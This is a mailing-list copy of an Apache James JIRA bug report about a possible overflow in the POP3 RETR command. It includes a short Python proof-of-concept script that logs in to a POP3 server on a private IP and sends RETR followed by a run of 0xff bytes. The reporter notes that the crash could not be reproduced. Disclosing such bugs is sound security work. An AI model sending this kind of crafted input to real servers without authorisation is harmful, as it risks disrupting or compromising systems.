You are viewing a plain text version of this content. The canonical link for it is here.

Posted to server-dev@james.apache.org by "Gautier DI FOLCO (JIRA)" <se...@james.apache.org> on 2019/01/25 14:33:00 UTC

[jira] [Created] (JAMES-2652) Possible overflow on RETR command

Gautier DI FOLCO created JAMES-2652:
---------------------------------------

             Summary: Possible overflow on RETR command
                 Key: JAMES-2652
                 URL: https://issues.apache.org/jira/browse/JAMES-2652
             Project: James Server
          Issue Type: Bug
          Components: POP3Server
            Reporter: Gautier DI FOLCO


Some vulnerability might have been found in POP3's RETR command

Here is then enclosed Python code for the Proof of Concept:
{code:java}
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#badchars = "\x00"
data = "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
buffer = "USER test@james.local \r\n PASS test \r\n" + "RETR" + " " + data

# try:
print "Sending"
connect=s.connect(('192.168.138.129',110))
s.recv(1024)
s.send(buffer)
print "Check DBG"
{code}
Sadly I was not able to reproduce it but I've added some tests



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

---------------------------------------------------------------------
To unsubscribe, e-mail: server-dev-unsubscribe@james.apache.org
For additional commands, e-mail: server-dev-help@james.apache.org